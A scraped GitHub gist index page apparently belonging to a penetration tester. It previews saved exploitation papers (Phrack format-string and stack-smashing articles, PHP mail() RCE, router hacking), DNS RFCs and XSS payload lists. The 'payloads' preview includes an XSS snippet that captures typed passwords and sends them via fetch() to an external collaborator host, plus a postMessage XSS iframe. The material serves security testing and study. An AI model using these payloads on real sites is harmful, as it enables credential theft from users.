PikaChu cyberheartmi9
cyberheartmi9
/ Format String
Created
August 22, 2017 23:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ==Phrack Inc.== | |
| 0x0b, Issue 0x3b, Phile #0x07 of 0x12 | |
| |=-------------=[ Advances in format string exploitation ]=--------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=---------=[ by gera <[email protected]>, riq <[email protected]> ]=---------=| | |
| 1 - Intro |
cyberheartmi9
/ Smashing The Stack For Fun And Profit
Created
August 22, 2017 23:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .oO Phrack 49 Oo. | |
| Volume Seven, Issue Forty-Nine | |
| File 14 of 16 | |
| BugTraq, r00t, and Underground.Org | |
| bring you | |
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
cyberheartmi9
/ Pwning PHP mail() function For Fun And RCE
Created
August 22, 2017 23:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| |=-----------------------------------------------------------------------=| | |
| |=-------------=[ Pwning PHP mail() function For Fun And RCE ]=---------=| | |
| |=---------------=[ New Exploitation Techniques And Vectors ]=-----------=| | |
| |=----------------------------=[ Release 1.0 ]=--------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=----------------=[ by https://legalhackers.com/ ]=-------------------=| | |
| |=-----------------------------------------------------------------------=| | |
| |=---------------------=[ https://ExploitBox.io ]=-------------------=| | |
| |=---------------------=[ @Exploit_Box ]=-------------------=| |
cyberheartmi9
/ From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case)
Created
August 22, 2017 23:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case) | |
| =================================================================== | |
| - Leon Juranic <leon[at]defensecode.com> | |
| http://www.defensecode.com/ | |
| Date: 03/10/2013 | |
cyberheartmi9
/ Format String Technique
Created
August 22, 2017 23:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .oO NOP Ninjas Oo. | |
| presents: [Format String Technique] | |
| www.nopninjas.com | |
cyberheartmi9
/ ghetto XSS payloads
Created
August 22, 2017 23:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _____ _ _ _ __ _______ _____ _____ _ _ _ _ | |
| | __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | | | |
| | | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_ | |
| | | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __| | |
| | |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_ | |
| \____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__| | |
| A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air. | |
| Simple character manipulations. |
cyberheartmi9
/ DNS Zone Transfer Protocol (AXFR)
Created
August 22, 2017 23:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Internet Engineering Task Force (IETF) E. Lewis | |
| Request for Comments: 5936 NeuStar, Inc. | |
| Updates: 1034, 1035 A. Hoenes, Ed. | |
| Category: Standards Track TR-Sys |
cyberheartmi9
/ DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION
Created
August 22, 2017 23:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Network Working Group P. Mockapetris | |
| Request for Comments: 1035 ISI | |
| November 1987 | |
| Obsoletes: RFCs 882, 883, 973 | |
| DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION | |
| 1. STATUS OF THIS MEMO |
cyberheartmi9
/ payloads
Last active
October 9, 2024 08:44
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################## xss using postmessage api ############### | |
| <iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')"> | |
| ################ Exploiting cross-site scripting to capture passwords ############################################ | |
| <input name=username id=username> | |
| <input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{ | |
| method:'POST', | |
| mode: 'no-cors', | |
| body:username.value+':'+this.value | |
| });"> | |
| #########################hunting phishing site ############################ |
cyberheartmi9
/ DOMAIN NAMES - CONCEPTS AND FACILITIES
Created
August 22, 2017 23:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Network Working Group P. Mockapetris | |
| Request for Comments: 1034 ISI | |
| Obsoletes: RFCs 882, 883, 973 November 1987 | |
| DOMAIN NAMES - CONCEPTS AND FACILITIES | |
| 1. STATUS OF THIS MEMO |
OlderNewer